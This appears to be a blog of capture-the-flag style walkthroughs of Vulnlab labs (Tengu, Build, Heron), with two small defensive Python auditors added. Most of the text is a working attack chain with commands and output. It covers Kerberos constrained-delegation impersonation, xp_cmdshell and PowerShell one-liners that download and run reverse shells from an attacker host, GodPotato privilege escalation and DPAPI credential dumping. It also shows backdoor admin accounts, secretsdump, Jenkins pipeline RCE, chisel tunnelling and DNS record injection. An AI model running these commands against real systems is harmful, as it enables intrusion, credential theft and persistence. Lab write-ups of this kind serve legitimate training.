LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 

 

We notice that the gMSA account is allowed to delegate (constrained delegation with protocol transition):

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo         
-----------  -----------------------------------  ----------------------------------  --------------------------
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/SQL:1433          
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl:1433 
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl      
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql               
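As an added audit example (not impacket's findDelegation, whose output is shown above), the classification of delegation settings from the `userAccountControl` bits and `msDS-AllowedToDelegateTo`, which is what an AD admin reviews to decide which accounts should lose protocol transition. The LDAP records are constructed: gMSA01$ mirrors the four rows above, while DC$, svc_web and web.tengu.vl are invented contrast cases.

```python
# userAccountControl bits relevant to delegation
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2self allowed)
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # domain controllers
NORMAL_ACCOUNT = 0x200

# Constructed LDAP-style records (not a real dump). gMSA01$ mirrors the four
# findDelegation rows above; the other three accounts are contrast cases.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "gMSA01$",
     "objectClass": ["top", "person", "msDS-GroupManagedServiceAccount"],
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/SQL:1433", "MSSQLSvc/sql.tengu.vl:1433",
                                  "MSSQLSvc/sql.tengu.vl", "MSSQLSvc/sql"]},
    {"sAMAccountName": "DC$", "objectClass": ["top", "computer"],
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "svc_web", "objectClass": ["top", "person", "user"],
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["HTTP/web.tengu.vl"]},
    {"sAMAccountName": "t2_m.winters", "objectClass": ["top", "person", "user"],
     "userAccountControl": NORMAL_ACCOUNT, "msDS-AllowedToDelegateTo": []},
]


def account_type(record):
    """Label the account the way the findDelegation table above does."""
    oc = record["objectClass"]
    if "msDS-GroupManagedServiceAccount" in oc:
        return "ms-DS-Group-Managed-Service-Account"
    return "Computer" if "computer" in oc else "Person"


def delegation_type(record):
    """None, 'Unconstrained', 'Constrained' or 'Constrained w/ Protocol Transition'."""
    uac = record["userAccountControl"]
    targets = record.get("msDS-AllowedToDelegateTo") or []
    if uac & TRUSTED_FOR_DELEGATION:
        return "Unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        # The dangerous case on this box: the account may obtain a service
        # ticket for the listed SPNs on behalf of any user it names (S4U2self
        # followed by S4U2proxy) without that user ever authenticating.
        return "Constrained w/ Protocol Transition"
    if targets:
        return "Constrained"
    return None


def find_delegation(records, skip_domain_controllers=True):
    """One (account, type, delegation, target SPN) row per allowed target."""
    rows = []
    for rec in records:
        if skip_domain_controllers and rec["userAccountControl"] & SERVER_TRUST_ACCOUNT:
            continue  # DCs are unconstrained by design; review them separately
        dtype = delegation_type(rec)
        if dtype is None:
            continue
        for spn in rec.get("msDS-AllowedToDelegateTo") or ["N/A"]:
            rows.append((rec["sAMAccountName"], account_type(rec), dtype, spn))
    return rows


def protocol_transition_accounts(records):
    """Accounts to review first: protocol transition is rarely actually needed."""
    return sorted({r[0] for r in find_delegation(records, False)
                   if r[2] == "Constrained w/ Protocol Transition"})
```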

In BloodHound we find a SQL_Admins group containing two users; next we impersonate one of them.

Getting the ticket:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
                                                                                                                             

export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters  dbo@master)> 


SQL (TENGU\t1_m.winters  dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"

Catch the shell:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ rlwrap nc -nlvp 443                                 
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp> 


GodPotato on SQL:

PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888

Catch the shell as NT AUTHORITY\SYSTEM and add ourselves as a local admin on SQL.

But first, find the credentials of the domain admin TENGU\T0_c.fowler.

Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.

PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*]    m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544


[*] SYSTEM master key cache:

{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86


[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : Unt<redacted>y25

 


 

PS C:\temp> net user puck Password123! /add
The command completed successfully.

PS C:\temp> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
puck                     WDAGUtilityAccount       
The command completed with one or more errors.

PS C:\temp> net localgroup administrators puck /add
The command completed successfully.

Next, RDP to SQL as puck:

proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389

From there, start Active Directory Users and Computers as that user and add a domain-admin user puck, then mstsc to dc.tengu.vl.

Finally, do a hashdump:

proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt

Because all Domain Admins are members of the group PROTECTED USERS@TENGU.VL, we can't RDP in.

That was super fun

vulnlab-build

an easy Linux box

rsync enumeration:

└─$ rsync -av --list-only rsync://10.10.94.243
backups         backups
└─$ rsync -r rsync://10.10.94.243::backups

Decrypting the Jenkins password:

┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets]
└─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml
Git<redacted>!

Log in to Gitea as user buildadm and get RCE by editing the Jenkinsfile.

Start a netcat listener to catch the shell

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001              
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}

Run the chisel server on the Kali box:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ chisel server -p 8000 --reverse     
2024/08/09 10:26:20 server: Reverse tunnelling enabled
2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE=
2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000
2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

From inside the Docker container:

# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8506k  100 8506k    0     0  8620k      0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root    4096 Aug  9 08:25 .
drwxr-xr-x 1 root root    4096 May  9 18:50 ..
lrwxrwxrwx 1 root root       9 May  1 14:37 .bash_history -> /dev/null
-r-------- 1 root root      35 May  1 17:37 .rhosts
drwxr-xr-x 2 root root    4096 May  1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug  9 08:25 chisel
-rw------- 1 root root      37 May  1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)

Nmap the Docker host (172.18.0.1) over the SOCKS proxy:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds
                                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/build]

Next, the MySQL part: connect to the database on the Docker host as root.

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.18.0.1:3306  ...  OK
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.025 sec)

MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                                                     | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)

MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)

MariaDB [powerdnsadmin]> 
MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
    -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1);
Query OK, 1 row affected (0.023 sec)

MariaDB [powerdnsadmin]> 

Crack the admin bcrypt hash with john:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ john admin.hash                                            
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst
wi<redacted>on          (?)     
1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Install the rsh client on the Kali box:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ sudo apt-get install rsh-redone-client

rsh to the build.vl machine as root:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Aug  9 08:42:41 AM UTC 2024

  System load:                      0.64306640625
  Usage of /:                       62.7% of 9.75GB
  Memory usage:                     60%
  Swap usage:                       0%
  Processes:                        144
  Users logged in:                  0
  IPv4 address for br-f8002c9d7234: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens5:            10.10.94.243


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~# 
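
The rsh login above works because the 35-byte /root/.rhosts listed earlier grants password-less access on the basis of the caller's address alone. The Python script below is an added example (not part of the writeup, and not from any tool it uses) that audits a .rhosts file and explains what each entry grants; the SAMPLE_RHOSTS content is constructed for the demonstration, since the writeup does not show the real file's contents.

```python
from dataclasses import dataclass

# Constructed sample .rhosts content for the demonstration; it is not the
# 35-byte /root/.rhosts from the box, whose contents the writeup does not show.
SAMPLE_RHOSTS = """\
# hosts allowed to rsh/rlogin in without a password
+ +
10.8.0.12 root
jenkins.build.vl
-untrusted.build.vl
+@buildhosts
"""


@dataclass
class Finding:
    line_no: int
    entry: str
    severity: str   # critical / high / medium / info
    reason: str


def audit_rhosts(text: str, owner: str = "root") -> list[Finding]:
    """Audit a .rhosts file belonging to `owner` and explain every entry.

    Format: one "host [user]" pair per line. A missing user means the same
    username as the file owner, '+' is a wildcard, '+@name' is a NIS netgroup
    and a leading '-' denies instead of allows.
    """
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not entry:
            continue
        parts = entry.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else owner

        if host.startswith("-"):
            sev, why = "info", f"explicit deny for {host[1:]}"
        elif host == "+" and user == "+":
            sev, why = "critical", f"any user on any host may log in as {owner}"
        elif host == "+":
            sev, why = "critical", f"any host may log in as {owner} (remote user {user})"
        elif user == "+":
            sev, why = "critical", f"any user on {host} may log in as {owner}"
        elif host.startswith("+@"):
            sev, why = "high", f"every host in netgroup {host[2:]} may log in as {owner}"
        else:
            sev, why = "medium", (f"{user}@{host} may log in as {owner} on the basis of "
                                  "its source address alone (no cryptographic authentication)")
        findings.append(Finding(line_no, entry, sev, why))
    return findings


def worst_severity(findings: list[Finding]) -> str:
    """Highest severity among the findings; 'info' for an empty or clean file."""
    order = ["info", "medium", "high", "critical"]
    return max((f.severity for f in findings), key=order.index, default="info")


if __name__ == "__main__":
    results = audit_rhosts(SAMPLE_RHOSTS)
    for f in results:
        print(f"line {f.line_no:>2} [{f.severity:<8}] {f.entry!r}: {f.reason}")
    print("overall:", worst_severity(results))
```

Even a "medium" entry is a problem for root: rsh and rlogin send everything in the clear and trust the source address, which is why the box's rsh service plus any root .rhosts is enough for a full takeover once an attacker has a foothold on a trusted network segment.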
                                                                                       

That was fun.

vulnlab-heron

a medium chain

We find a note online with the initial credentials for the Linux box: pentest:Heron123!

We start chisel on our Kali box:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ chisel server -p 8000 --reverse 
2024/08/02 14:29:11 server: Reverse tunnelling enabled
2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM=
2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000
2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

SSH to the jump host as pentest and run the chisel client from there:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ ssh pentest@10.10.148.86                                      
The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts.
****************************************************
*              Welcome to Heron Corp               *
*  Unauthorized access to 'frajmp.heron.vl' is     *
*  forbidden and will be prosecuted by law.        *
****************************************************
(pentest@10.10.148.86) Password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)

 System information as of Fri Aug  2 12:24:16 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   44.8% of 9.75GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.148.86
  Swap usage:   0%


Last login: Fri Jun  7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ who
pentest  pts/0        2024-08-02 12:24 (10.8.2.138)
pentest@frajmp:~$ cd /tmp
pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel
--2024-08-02 12:28:23--  http://10.8.2.138/chisel
Connecting to 10.8.2.138:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel                100%[=======================>]   8.31M  6.88MB/s    in 1.2s    

2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104]

pentest@frajmp:/tmp$ chmod +x chisel 
pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000
2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)

We run a slow nmap scan over proxychains against the DC:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:53  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

Nmap scan report for 10.10.148.85
Host is up (0.062s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
53/tcp   open   domain        Simple DNS Plus
80/tcp   open   http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open   msrpc         Microsoft Windows RPC
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after:  2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp  closed https
445/tcp  open   microsoft-ds  Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open   ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HERON
|   NetBIOS_Domain_Name: HERON
|   NetBIOS_Computer_Name: MUCDC
|   DNS_Domain_Name: heron.vl
|   DNS_Computer_Name: mucdc.heron.vl
|   DNS_Tree_Name: heron.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after:  2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-02T12:49:12
|_  start_date: N/A
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery: 
|   OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
|   Computer name: mucdc
|   NetBIOS computer name: MUCDC\x00
|   Domain name: heron.vl
|   Forest name: heron.vl
|   FQDN: mucdc.heron.vl
|_  System time: 2024-08-02T05:49:10-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

On the open port 80 we curl the site and find some usernames:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85          
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
<!DOCTYPE html>
<html lang="en">
<body>
    <div class="container mt-5">
        <div class="text-center mb-4">
            <h1 class="display-4 text-white">Heron Corp</h1>
            <p class="lead text-white">Building the future of aerospace with precision and innovation.</p>


                        <h5 class="card-title">Wayne Wood</h5>
                        <p class="card-text">CEO</p>
                        <p>Email: wayne.wood@heron.vl</p>

                        <h5 class="card-title">Julian Pratt</h5>
                        <p class="card-text">Head of IT</p>
                        <p>Email: julian.pratt@heron.vl</p>

                        <i class="fas fa-user-tie fa-3x mb-3"></i>
                        <h5 class="card-title">Samuel Davies</h5>
                        <p class="card-text">Accounting</p>
                        <p>Email: samuel.davies@heron.vl</p>

</body>
